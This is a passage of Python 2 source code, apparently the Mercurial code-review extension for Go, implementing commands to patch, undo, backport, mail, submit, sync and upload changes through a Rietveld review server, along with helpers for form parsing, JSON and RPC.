    Move changes since the weekly into the release branch
    using hg release-apply followed by the usual code review
    process and hg submit.

    When it comes time to tag the release, record the
    final long-form tag of the release-branch.rNN
    in the *default* branch's .hgtags file. That is, run

    hg update default

    and then edit .hgtags as you would for a weekly.
    """
    c = repo[None]
    if not releaseBranch:
        return "no active release branches"
    if c.branch() != releaseBranch:
        # Not on the release branch yet: require a clean client, then switch.
        if c.modified() or c.added() or c.removed():
            raise util.Abort("uncommitted local changes - cannot switch branches")
        err = hg.clean(repo, releaseBranch)
        if err:
            return err
    try:
        err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
        if err:
            raise util.Abort(err)
    except Exception, e:
        # On any failure, return the client to the default branch.
        hg.clean(repo, "default")
        raise e
    return None
def rev2clname(rev):
    """Extract the CL number from a revision description, or "" if absent.

    The last line in the description that is a codereview URL is the real
    one; earlier lines might be part of the user-written description.
    """
    matches = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
    return matches[-1] if matches else ""
# Description templates for CLs created by hg undo and hg release-apply;
# the original CL description is wrapped in ««« ... »»» markers.
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""

undoFooter = """
»»»
"""

backportHeader = """[%s] %s
««« CL %s / %s
"""

backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
    """Shared implementation of clpatch, undo and release-apply (backport).

    Builds or downloads a patch for clname, ports its line numbers to the
    current client if necessary, and applies it with hgpatch.  Returns an
    error string, or None/'' on success.
    """
    if missing_codereview:
        return missing_codereview

    if mode == "undo" or mode == "backport":
        if hgversion < '1.4':
            # Don't have cmdutil.match (see implementation of sync command).
            return "hg is too old to run hg %s - update to 1.4 or newer" % mode

        # Find revision in Mercurial repository.
        # Assume CL number is 7+ decimal digits.
        # Otherwise is either change log sequence number (fewer decimal digits),
        # hexadecimal hash, or tag name.
        # Mercurial will fall over long before the change log
        # sequence numbers get to be 7 digits long.
        if re.match('^[0-9]{7,}$', clname):
            found = False
            matchfn = cmdutil.match(repo, [], {'rev': None})
            def prep(ctx, fns):
                pass
            for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
                rev = repo[ctx.rev()]
                # Last line with a code review URL is the actual review URL.
                # Earlier ones might be part of the CL description.
                n = rev2clname(rev)
                if n == clname:
                    found = True
                    break
            if not found:
                return "cannot find CL %s in local repository" % clname
        else:
            rev = repo[clname]
            if not rev:
                return "unknown revision %s" % clname
            clname = rev2clname(rev)
            if clname == "":
                return "cannot find CL name in revision description"

        # Create fresh CL and start with patch that would reverse the change.
        vers = short(rev.node())
        cl = CL("new")
        desc = str(rev.description())
        if mode == "undo":
            cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
        else:
            # NOTE(review): uses undoFooter here too; its text is identical
            # to backportFooter, so behavior is the same either way.
            cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
        v1 = vers
        v0 = short(rev.parents()[0].node())
        if mode == "undo":
            # Reverse diff: new -> old.
            arg = v1 + ":" + v0
        else:
            # Forward diff: old -> new (and port from the parent version).
            vers = v0
            arg = v0 + ":" + v1
        patch = RunShell(["hg", "diff", "--git", "-r", arg])

    else:  # clpatch
        cl, vers, patch, err = DownloadCL(ui, repo, clname)
        if err != "":
            return err
        if patch == emptydiff:
            return "codereview issue %s has no diff" % clname

    # find current hg version (hg identify)
    ctx = repo[None]
    parents = ctx.parents()
    id = '+'.join([short(p.node()) for p in parents])

    # if version does not match the patch version,
    # try to update the patch line numbers.
    if vers != "" and id != vers:
        # "vers in repo" gives the wrong answer
        # on some versions of Mercurial.  Instead, do the actual
        # lookup and catch the exception.
        try:
            repo[vers].description()
        except:
            return "local repository is out of date; sync to get %s" % (vers)
        patch1, err = portPatch(repo, patch, vers, id)
        if err != "":
            if not opts["ignore_hgpatch_failure"]:
                return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
        else:
            patch = patch1
    argv = ["hgpatch"]
    if opts["no_incoming"] or mode == "backport":
        argv += ["--checksync=false"]
    try:
        cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
    except:
        return "hgpatch: " + ExceptionDetail()
    out, err = cmd.communicate(patch)
    if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
        return "hgpatch failed"
    cl.local = True
    # hgpatch prints the files it touched, one per line.
    cl.files = out.strip().split()
    if not cl.files and not opts["ignore_hgpatch_failure"]:
        return "codereview issue %s has no changed files" % clname
    files = ChangedFiles(ui, repo, [], opts)
    extra = Sub(cl.files, files)
    if extra:
        ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
    cl.Flush(ui, repo)
    if mode == "undo":
        # Let the user record the reason for the undo in the description.
        err = EditCL(ui, repo, cl)
        if err != "":
            return "CL created, but error editing: " + err
        cl.Flush(ui, repo)
    else:
        ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
    """Shift the @@-hunk line numbers in patch so it applies to newver.

    Returns (newpatch, err); err is '' on success.
    """
    lines = patch.splitlines(True)  # True = keep \n
    delta = None  # line-number deltas for the file of the current hunk
    for i in range(len(lines)):
        line = lines[i]
        if line.startswith('--- a/'):
            # New file section: recompute its deltas.
            file = line[6:-1]
            delta = fileDeltas(repo, file, oldver, newver)
        if not delta or not line.startswith('@@ '):
            continue
        # @@ -x,y +z,w @@ means the patch chunk replaces
        # the original file's line numbers x up to x+y with the
        # line numbers z up to z+w in the new file.
        # Find the delta from x in the original to the same
        # line in the current version and add that delta to both
        # x and z.
        m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
        if not m:
            return None, "error parsing patch line numbers"
        n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
        d, err = lineDelta(delta, n1, len1)
        if err != "":
            return "", err
        n1 += d
        n2 += d
        lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
    newpatch = ''.join(lines)
    return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
    cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
    data = RunShell(cmd, silent_ok=True)
    deltas = []
    for line in data.splitlines():
        # Only the @@-hunk headers carry line-number information.
        m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
        if not m:
            continue
        n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
        deltas.append((n1, len1, n2+len2-(n1+len1)))
    return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
    # NOTE: the parameter name `len` shadows the builtin; kept for
    # interface compatibility with existing callers.
    d = 0
    for (old, oldlen, newdelta) in deltas:
        if old >= n+len:
            # Deltas are in ascending order; this and later ones start
            # past our range, so the accumulated delta is final.
            break
        if old+oldlen > n:
            # The modified range [old, old+oldlen) overlaps [n, n+len).
            # (The previous test used old+len, i.e. the query length,
            # which mis-detects overlap whenever oldlen != len.)
            return 0, "patch and recent changes conflict"
        d = newdelta
    return d, ""
def download(ui, repo, clname, **opts):
    """download a change from the code review server

    Download prints a description of the given change list
    followed by its diff, downloaded from the code review server.
    """
    if missing_codereview:
        return missing_codereview
    cl, vers, patch, err = DownloadCL(ui, repo, clname)
    if err != "":
        return err
    ui.write(cl.EditorText() + "\n")
    ui.write(patch + "\n")
    return
# NOTE: shadows the Python 2 builtin `file`; the name is the hg command name.
def file(ui, repo, clname, pat, *pats, **opts):
    """assign files to or remove files from a change list

    Assign files to or (with -d) remove files from a change list.

    The -d option only removes files from the change list.
    It does not edit them or remove them from the repository.
    """
    if missing_codereview:
        return missing_codereview

    pats = tuple([pat] + list(pats))
    if not GoodCLName(clname):
        return "invalid CL name " + clname

    dirty = {}  # CLs that need to be flushed back to disk
    cl, err = LoadCL(ui, repo, clname, web=False)
    if err != '':
        return err
    if not cl.local:
        return "cannot change non-local CL " + clname

    files = ChangedFiles(ui, repo, pats, opts)

    if opts["delete"]:
        oldfiles = Intersect(files, cl.files)
        if oldfiles:
            if not ui.quiet:
                # Show the commands that would restore the removed files.
                ui.status("# Removing files from CL. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                for f in oldfiles:
                    ui.status("# hg file %s %s\n" % (cl.name, f))
            cl.files = Sub(cl.files, oldfiles)
            cl.Flush(ui, repo)
        else:
            ui.status("no such files in CL")
        return

    if not files:
        return "no such modified files"

    files = Sub(files, cl.files)
    taken = Taken(ui, repo)
    warned = False
    for f in files:
        if f in taken:
            # Steal the file from the CL that currently claims it.
            if not warned and not ui.quiet:
                ui.status("# Taking files from other CLs. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                warned = True
            ocl = taken[f]
            if not ui.quiet:
                ui.status("# hg file %s %s\n" % (ocl.name, f))
            if ocl not in dirty:
                ocl.files = Sub(ocl.files, files)
                dirty[ocl] = True
    cl.files = Add(cl.files, files)
    dirty[cl] = True
    for d, _ in dirty.items():
        d.Flush(ui, repo)
    return
def gofmt(ui, repo, *pats, **opts):
    """apply gofmt to modified files

    Applies gofmt to the modified files in the repository that match
    the given patterns.
    """
    if missing_codereview:
        return missing_codereview

    files = ChangedExistingFiles(ui, repo, pats, opts)
    files = [f for f in files if f.endswith(".go")]
    if not files:
        return "no modified go files"
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    try:
        cmd = ["gofmt", "-l"]
        if not opts["list"]:
            # -w rewrites the files in place; --list only prints their names.
            cmd += ["-w"]
        if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
            raise util.Abort("gofmt did not exit cleanly")
    except error.Abort, e:
        raise
    except:
        raise util.Abort("gofmt: " + ExceptionDetail())
    return
def mail(ui, repo, *pats, **opts):
    """mail a change for review

    Uploads a patch to the code review server and then sends mail
    to the reviewer and CC list asking for a review.
    """
    if missing_codereview:
        return missing_codereview

    cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
    if err != "":
        return err
    cl.Upload(ui, repo, gofmt_just_warn=True)
    if not cl.reviewer:
        # If no reviewer is listed, assign the review to defaultcc.
        # This makes sure that it appears in the
        # codereview.appspot.com/user/defaultcc
        # page, so that it doesn't get dropped on the floor.
        if not defaultcc:
            return "no reviewers listed in CL"
        cl.cc = Sub(cl.cc, defaultcc)
        cl.reviewer = defaultcc
        cl.Flush(ui, repo)
    if cl.files == []:
        return "no changed files, not sending mail"
    cl.Mail(ui, repo)
def pending(ui, repo, *pats, **opts):
    """show pending changes

    Lists pending changes followed by a list of unassigned but modified files.
    """
    if missing_codereview:
        return missing_codereview

    m = LoadAllCL(ui, repo, web=True)
    names = m.keys()
    names.sort()
    for name in names:
        cl = m[name]
        ui.write(cl.PendingText() + "\n")

    files = DefaultFiles(ui, repo, [], opts)
    if len(files) > 0:
        s = "Changed files not in any CL:\n"
        for f in files:
            s += "\t" + f + "\n"
        ui.write(s)
def reposetup(ui, repo):
    # Hook cmdutil.match once per process (original_match doubles as the
    # "already installed" flag), then do per-repo Rietveld setup.
    global original_match
    if original_match is None:
        start_status_thread()
        original_match = cmdutil.match
        cmdutil.match = ReplacementForCmdutilMatch
        RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
    """Return the 'Name <email>' CONTRIBUTORS line for user (or the
    configured username); abort if the user is not a contributor."""
    set_status("checking CONTRIBUTORS file")
    user, userline = FindContributor(ui, repo, user, warn=False)
    if not userline:
        raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
    return userline
def FindContributor(ui, repo, user=None, warn=True):
    """Look user up in the contributors table.

    Returns (email, 'Name <email>') on success, or (user, None) if the
    user is unknown (warning unless warn=False).
    """
    if not user:
        user = ui.config("ui", "username")
        if not user:
            raise util.Abort("[ui] username is not configured in .hgrc")
    user = user.lower()
    # Accept "Name <email>" form; keys in contributors are bare emails.
    m = re.match(r".*<(.*)>", user)
    if m:
        user = m.group(1)
    if user not in contributors:
        if warn:
            ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
        return user, None
    user, email = contributors[user]
    return email, "%s <%s>" % (user, email)
def submit(ui, repo, *pats, **opts):
    """submit change to remote repository
    Submits change to remote repository.
    Bails out if the local repository is not in sync with the remote one.
    """
    if missing_codereview:
        return missing_codereview
    # We already called this on startup but sometimes Mercurial forgets.
    set_mercurial_encoding_to_utf8()
    repo.ui.quiet = True
    if not opts["no_incoming"] and Incoming(ui, repo, opts):
        return "local repository out of date; must sync before submit"
    cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
    if err != "":
        return err
    # If the CL was copied from someone else (via clpatch), that person
    # is the author; otherwise the local user must be a contributor.
    user = None
    if cl.copied_from:
        user = cl.copied_from
    userline = CheckContributor(ui, repo, user)
    typecheck(userline, str)
    # Build the R=/TBR=/CC= trailer that gets appended to the commit message.
    about = ""
    if cl.reviewer:
        about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
    if opts.get('tbr'):
        tbr = SplitCommaSpace(opts.get('tbr'))
        cl.reviewer = Add(cl.reviewer, tbr)
        about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
    if cl.cc:
        about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
    if not cl.reviewer:
        return "no reviewers listed in CL"
    if not cl.local:
        return "cannot submit non-local CL"
    # upload, to sync current patch and also get change number if CL is new.
    if not cl.copied_from:
        cl.Upload(ui, repo, gofmt_just_warn=True)
    # check gofmt for real; allowed upload to warn in order to save CL.
    cl.Flush(ui, repo)
    CheckFormat(ui, repo, cl.files)
    about += "%s%s\n" % (server_url_base, cl.name)
    if cl.copied_from:
        about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
    typecheck(about, str)
    if not cl.mailed and not cl.copied_from:  # in case this is TBR
        cl.Mail(ui, repo)
    # submit changes locally
    date = opts.get('date')
    if date:
        opts['date'] = util.parsedate(date)
        typecheck(opts['date'], str)
    opts['message'] = cl.desc.rstrip() + "\n\n" + about
    typecheck(opts['message'], str)
    if opts['dryrun']:
        print "NOT SUBMITTING:"
        print "User: ", userline
        print "Message:"
        print Indent(opts['message'], "\t")
        print "Files:"
        print Indent('\n'.join(cl.files), "\t")
        return "dry run; not submitted"
    m = match.exact(repo.root, repo.getcwd(), cl.files)
    node = repo.commit(ustr(opts['message']), ustr(userline), opts.get('date'), m)
    if not node:
        return "nothing changed"
    # push to remote; if it fails for any reason, roll back
    try:
        # Refuse to push if the commit would create a new head: that
        # means the local repository was out of sync after all.
        log = repo.changelog
        rev = log.rev(node)
        parents = log.parentrevs(rev)
        if (rev-1 not in parents and
                (parents == (nullrev, nullrev) or
                len(log.heads(log.node(parents[0]))) > 1 and
                (parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
            # created new head
            raise util.Abort("local repository out of date; must sync before submit")
        # push changes to remote.
        # if it works, we're committed.
        # if not, roll back
        other = getremote(ui, repo, opts)
        r = repo.push(other, False, None)
        if r == 0:
            raise util.Abort("local repository out of date; must sync before submit")
    except:
        # Any failure here (including the Aborts above) undoes the
        # local commit before re-raising.
        real_rollback()
        raise
    # we're committed. upload final patch, close review, add commit message
    changeURL = short(node)
    url = other.url()
    m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
    if m:
        changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
    else:
        print >>sys.stderr, "URL: ", url
    pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
    # When posting, move reviewers to CC line,
    # so that the issue stops showing up in their "My Issues" page.
    PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
    if not cl.copied_from:
        EditDesc(cl.name, closed=True, private=cl.private)
    cl.Delete(ui, repo)
    # If we just submitted on the release branch with a clean working
    # directory, switch back to the default branch.
    c = repo[None]
    if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
        ui.write("switching from %s to default branch.\n" % releaseBranch)
        err = hg.clean(repo, "default")
        if err:
            return err
    return None
def sync(ui, repo, **opts):
    """synchronize with remote repository
    Incorporates recent changes from the remote repository
    into the local repository.
    """
    if missing_codereview:
        return missing_codereview
    if not opts["local"]:
        # Route pull chatter through sync_note, which filters out the
        # progress messages we don't care about.
        ui.status = sync_note
        ui.note = sync_note
        other = getremote(ui, repo, opts)
        modheads = repo.pull(other)
        err = commands.postincoming(ui, repo, modheads, True, "tip")
        if err:
            return err
        commands.update(ui, repo, rev="default")
    # Always close any local CLs that Rietveld reports as submitted,
    # even with --local.
    sync_changes(ui, repo)
def sync_note(msg):
    # sync runs the pull in verbose mode to get the list of files
    # being updated, but that drags along a few progress messages we
    # don't care about; swallow those and pass everything else through.
    uninteresting = (
        'resolving manifests\n',
        'searching for changes\n',
        "couldn't find merge tool hgmerge\n",
    )
    if msg in uninteresting:
        return
    sys.stdout.write(msg)
def sync_changes(ui, repo):
    # Look through recent change log descriptions to find
    # potential references to http://.*/our-CL-number.
    # Double-check them by looking at the Rietveld log.
    def Rev(rev):
        # Close any local CL whose number appears in this revision's
        # description, once Rietveld confirms it was submitted as rev.
        desc = repo[rev].description().strip()
        for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
            if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
                ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
                cl, err = LoadCL(ui, repo, clname, web=False)
                if err != "":
                    ui.warn("loading CL %s: %s\n" % (clname, err))
                    continue
                if not cl.copied_from:
                    EditDesc(cl.name, closed=True, private=cl.private)
                cl.Delete(ui, repo)
    # walkchangerevs changed its API in Mercurial 1.4; support both forms.
    if hgversion < '1.4':
        get = util.cachefunc(lambda r: repo[r].changeset())
        changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
        # Only scan the 100 most recent revisions.
        n = 0
        for st, rev, fns in changeiter:
            if st != 'iter':
                continue
            n += 1
            if n > 100:
                break
            Rev(rev)
    else:
        matchfn = cmdutil.match(repo, [], {'rev': None})
        def prep(ctx, fns):
            pass
        for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
            Rev(ctx.rev())
    # Remove files that are not modified from the CLs in which they appear.
    all = LoadAllCL(ui, repo, web=False)
    changed = ChangedFiles(ui, repo, [], {})
    for _, cl in all.items():
        extra = Sub(cl.files, changed)
        if extra:
            ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
            for f in extra:
                ui.warn("\t%s\n" % (f,))
            cl.files = Sub(cl.files, extra)
            cl.Flush(ui, repo)
        if not cl.files:
            # CL is now empty; tell the user how to get rid of it.
            if not cl.copied_from:
                ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
            else:
                ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
    return
def upload(ui, repo, name, **opts):
    """upload diffs to the code review server
    Uploads the current modifications for a given change to the server.
    """
    if missing_codereview:
        return missing_codereview
    repo.ui.quiet = True
    cl, err = LoadCL(ui, repo, name, web=True)
    if err != "":
        return err
    if not cl.local:
        return "cannot upload non-local change"
    cl.Upload(ui, repo)
    # Print the issue URL so the user can find the review.
    print "%s%s\n" % (server_url_base, cl.name)
    return
# Command-line options shared by the commands that send a CL out for
# review (mail and submit); prepended to their per-command option lists
# in cmdtable below.
review_opts = [
    ('r', 'reviewer', '', 'add reviewer'),
    ('', 'cc', '', 'add cc'),
    ('', 'tbr', '', 'add future reviewer'),
    ('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: maps command name to
# (function, option list, synopsis string).
cmdtable = {
    # The ^ means to show this command in the help text that
    # is printed when running hg with no arguments.
    "^change": (
        change,
        [
            ('d', 'delete', None, 'delete existing change list'),
            ('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
            ('i', 'stdin', None, 'read change list from standard input'),
            ('o', 'stdout', None, 'print change list to standard output'),
            ('p', 'pending', None, 'print pending summary to standard output'),
        ],
        "[-d | -D] [-i] [-o] change# or FILE ..."
    ),
    "^clpatch": (
        clpatch,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    # Would prefer to call this codereview-login, but then
    # hg help codereview prints the help for this command
    # instead of the help for the extension.
    "code-login": (
        code_login,
        [],
        "",
    ),
    "^download": (
        download,
        [],
        "change#"
    ),
    "^file": (
        file,
        [
            ('d', 'delete', None, 'delete files from change list (but not repository)'),
        ],
        "[-d] change# FILE ..."
    ),
    "^gofmt": (
        gofmt,
        [
            ('l', 'list', None, 'list files that would change, but do not edit them'),
        ],
        "FILE ..."
    ),
    "^pending|p": (
        pending,
        [],
        "[FILE ...]"
    ),
    "^mail": (
        mail,
        review_opts + [
        ] + commands.walkopts,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^release-apply": (
        release_apply,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    # TODO: release-start, release-tag, weekly-tag
    "^submit": (
        submit,
        review_opts + [
            ('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
            ('n', 'dryrun', None, 'make change only locally (for testing)'),
        ] + commands.walkopts + commands.commitopts + commands.commitopts2,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^sync": (
        sync,
        [
            ('', 'local', None, 'do not pull changes from remote repository')
        ],
        "[--local]",
    ),
    "^undo": (
        undo,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    "^upload": (
        upload,
        [],
        "change#"
    ),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
# HTML form parser
class FormParser(HTMLParser):
    """Scrapes the name/value pairs of <input> and <textarea> elements
    out of an HTML page (used to read Rietveld's edit/publish forms)."""
    def __init__(self):
        self.map = {}        # field name -> field value
        self.curtag = None   # name of the <textarea> currently being read
        self.curdata = None  # text accumulated for that textarea so far
        HTMLParser.__init__(self)
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            # <input> carries its value in the attributes.
            key = None
            value = ''
            for a in attrs:
                if a[0] == 'name':
                    key = a[1]
                if a[0] == 'value':
                    value = a[1]
            if key is not None:
                self.map[key] = value
        if tag == "textarea":
            # <textarea> content arrives via handle_data; start collecting.
            key = None
            for a in attrs:
                if a[0] == 'name':
                    key = a[1]
            if key is not None:
                self.curtag = key
                self.curdata = ''
    def handle_endtag(self, tag):
        if tag == "textarea" and self.curtag is not None:
            self.map[self.curtag] = self.curdata
            self.curtag = None
            self.curdata = None
    def handle_charref(self, name):
        # Numeric character reference, e.g. &#65;
        self.handle_data(unichr(int(name)))
    def handle_entityref(self, name):
        # Named entity, e.g. &amp;. Unknown entities pass through verbatim.
        import htmlentitydefs
        if name in htmlentitydefs.entitydefs:
            self.handle_data(htmlentitydefs.entitydefs[name])
        else:
            self.handle_data("&" + name + ";")
    def handle_data(self, data):
        if self.curdata is not None:
            self.curdata += data
def JSONGet(ui, path):
    """Fetch path from the code review server and decode it as JSON.
    Returns the decoded object, or None (after a ui warning) on any failure.
    """
    try:
        data = MySend(path, force_auth=False)
        typecheck(data, str)
        d = fix_json(json.loads(data))
    except:
        # Deliberately broad: any network or parse error is reported as
        # a warning and converted into a None result for the caller.
        ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
        return None
    return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
    """Recursively normalize json.loads output (see comment above):
    UTF-8-encode unicode strings, drop None-valued dict entries, and
    canonicalize \\r\\n to \\n in strings. Mutates lists/dicts in place
    and returns the normalized value."""
    if type(x) in [str, int, float, bool, type(None)]:
        pass
    elif type(x) is unicode:
        x = x.encode("utf-8")
    elif type(x) is list:
        for i in range(len(x)):
            x[i] = fix_json(x[i])
    elif type(x) is dict:
        # Collect keys to delete first; deleting while iterating the
        # dict would break the iteration.
        todel = []
        for k in x:
            if x[k] is None:
                todel.append(k)
            else:
                x[k] = fix_json(x[k])
        for k in todel:
            del x[k]
    else:
        raise util.Abort("unknown type " + str(type(x)) + " in fix_json")
    if type(x) is str:
        x = x.replace('\r\n', '\n')
    return x
def IsRietveldSubmitted(ui, clname, hex):
    """Report whether Rietveld's message log for CL clname contains a
    '*** Submitted as <hash> ***' marker matching commit hex."""
    resp = JSONGet(ui, "/api/" + clname + "?messages=true")
    if resp is None:
        return False
    for msg in resp.get("messages", []):
        m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', msg.get("text", ""))
        if m is None:
            continue
        # Require at least 8 hex digits and a prefix match on the commit.
        if len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
            return True
    return False
def IsRietveldMailed(cl):
    """Report whether the CL's Rietveld message log shows that the
    review-request mail has already been sent."""
    phrase = "I'd like you to review this change"
    return any(phrase in msg.get("text", "")
               for msg in cl.dict.get("messages", []))
def DownloadCL(ui, repo, clname):
    """Fetch CL clname and its most recent patch set from Rietveld.
    Returns (cl, vers, diffdata, err); on failure the first three are
    None and err describes the problem.
    """
    set_status("downloading CL " + clname)
    cl, err = LoadCL(ui, repo, clname, web=True)
    if err != "":
        return None, None, None, "error loading CL %s: %s" % (clname, err)
    # Find most recent diff
    diffs = cl.dict.get("patchsets", [])
    if not diffs:
        return None, None, None, "CL has no patch sets"
    patchid = diffs[-1]
    patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
    if patchset is None:
        return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
    if patchset.get("patchset", 0) != patchid:
        return None, None, None, "malformed patchset information"
    # The patchset message looks like "diff -r <vers> ..."; extract the
    # revision the diff was taken against, if present.
    vers = ""
    msg = patchset.get("message", "").split()
    if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
        vers = msg[2]
    diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
    diffdata = MySend(diff, force_auth=False)
    # Print warning if email is not in CONTRIBUTORS file.
    email = cl.dict.get("owner_email", "")
    if not email:
        return None, None, None, "cannot find owner for %s" % (clname)
    him = FindContributor(ui, repo, email)
    me = FindContributor(ui, repo, None)
    if him == me:
        # Downloading one's own CL: recover its mailed state from the
        # Rietveld message log instead of marking it as copied.
        cl.mailed = IsRietveldMailed(cl)
    else:
        cl.copied_from = email
    return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
           content_type="application/octet-stream",
           timeout=None, force_auth=True,
           **kwargs):
    """Run MySend1 maybe twice, because Rietveld is unreliable."""
    try:
        return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
    except Exception, e:
        # Retry exactly once, and only after a server-side failure.
        if type(e) != urllib2.HTTPError or e.code != 500:  # only retry on HTTP 500 error
            raise
        print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
        time.sleep(2)
        return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
            content_type="application/octet-stream",
            timeout=None, force_auth=True,
            **kwargs):
    """Sends an RPC and returns the response.
    Args:
        request_path: The path to send the request to, eg /api/appversion/create.
        payload: The body of the request, or None to send an empty request.
        content_type: The Content-Type header to use.
        timeout: timeout in seconds; default None i.e. no timeout.
            (Note: for large requests on OS X, the timeout doesn't work right.)
        force_auth: authenticate even before the server demands it.
        kwargs: Any keyword arguments are converted into query string parameters.
    Returns:
        The response body, as a string.
    """
    # TODO: Don't require authentication. Let the server say
    # whether it is necessary.
    global rpc
    if rpc == None:
        # Lazily create the shared RPC server on first use.
        rpc = GetRpcServer(upload_options)
    self = rpc
    if not self.authenticated and force_auth:
        self._Authenticate()
    if request_path is None:
        return
    old_timeout = socket.getdefaulttimeout()
    socket.setdefaulttimeout(timeout)
    try:
        tries = 0
        while True:
            tries += 1
            args = dict(kwargs)
            url = "http://%s%s" % (self.host, request_path)
            if args:
                url += "?" + urllib.urlencode(args)
            req = self._CreateRequest(url=url, data=payload)
            req.add_header("Content-Type", content_type)
            try:
                f = self.opener.open(req)
                response = f.read()
                f.close()
                # Translate \r\n into \n, because Rietveld doesn't.
                response = response.replace('\r\n', '\n')
                # who knows what urllib will give us
                if type(response) == unicode:
                    response = response.encode("utf-8")
                typecheck(response, str)
                return response
            except urllib2.HTTPError, e:
                if tries > 3:
                    raise
                elif e.code == 401:
                    # Credentials expired; re-authenticate and retry.
                    self._Authenticate()
                elif e.code == 302:
                    # Only re-authenticate on redirects to the Google
                    # account login; give up on any other redirect.
                    loc = e.info()["location"]
                    if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
                        return ''
                    self._Authenticate()
                else:
                    raise
    finally:
        # Restore the process-wide socket timeout no matter what.
        socket.setdefaulttimeout(old_timeout)
def GetForm(url):
    """Fetch url from the review server and return its HTML form
